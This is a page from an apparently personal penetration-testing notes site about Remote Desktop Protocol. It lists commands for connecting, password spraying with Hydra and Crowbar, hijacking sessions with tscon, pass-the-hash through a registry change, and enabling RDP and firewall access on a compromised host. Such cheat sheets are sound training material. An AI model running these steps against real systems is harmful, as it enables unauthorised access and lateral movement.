RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • ABOUT
  • CONNECTING
  • Rdesktop
  • Xfreerdp
  • Remmina (GUI)
  • PASSWORD SPRAYING
  • Crowbar
  • Hydra
  • SESSION HIJACKING
  • PASS-THE-HASH
  • ENABLE FROM SYSTEM
  • Tips2Hack
  1. PENTESTING
  2. Protocols

RDP

ABOUT

Remote Desktop Protocol (RDP) is a protocol developed by Microsoft for remote access to a computer running the Windows OS. This protocol allows display and control commands to be transmitted via the GUI encrypted over IP networks. Works at Application Layer of TCP/IP model, typically using TCP/3389 port. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. It uses TLS/SSL.

CONNECTING

Rdesktop

rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

Regular

xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore

With Port-Forwarding

xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Mounting a local dir

xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123

Remmina (GUI)

reminna

PASSWORD SPRAYING

Crowbar

crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'

Hydra

hydra -L users.txt -p 'amogus' 13.13.13.13 rdp

SESSION HIJACKING

tscon 13 /dest:V17

PASS-THE-HASH

By default, Windows has disabled Restricted Admin Mode, and we need to fix that by adding new registry key to DisableRestrictedAdmin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

And then to use xfreerdp for Pass The Hash

xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031

ENABLE FROM SYSTEM

As example one time I needed to access internal host, so it would be good if I turned on rdp and made a port forwarding, So here's the steps do do it

  1. Change fDenyTSConnections Registry key which denies RDP connections

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# OR same thing but with PowerShell, to convenience

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0

  1. Changing a Firewall to allow us to move through RDP

netsh advfirewall firewall set rule group='remote desktop' new enable=yes

Tips2Hack

  1. Nmap RDP Scan

nmap -sV -sC 13.13.13.13 -p3389 --script rdp*
./rdp-sec-check.pl 13.13.13.13
PreviousSSHNextSMTP

We need SYSTEM privileges and use tscon.exe (allows to connect to another desktop session)

RDP Security Check

[LINK]
[LINK]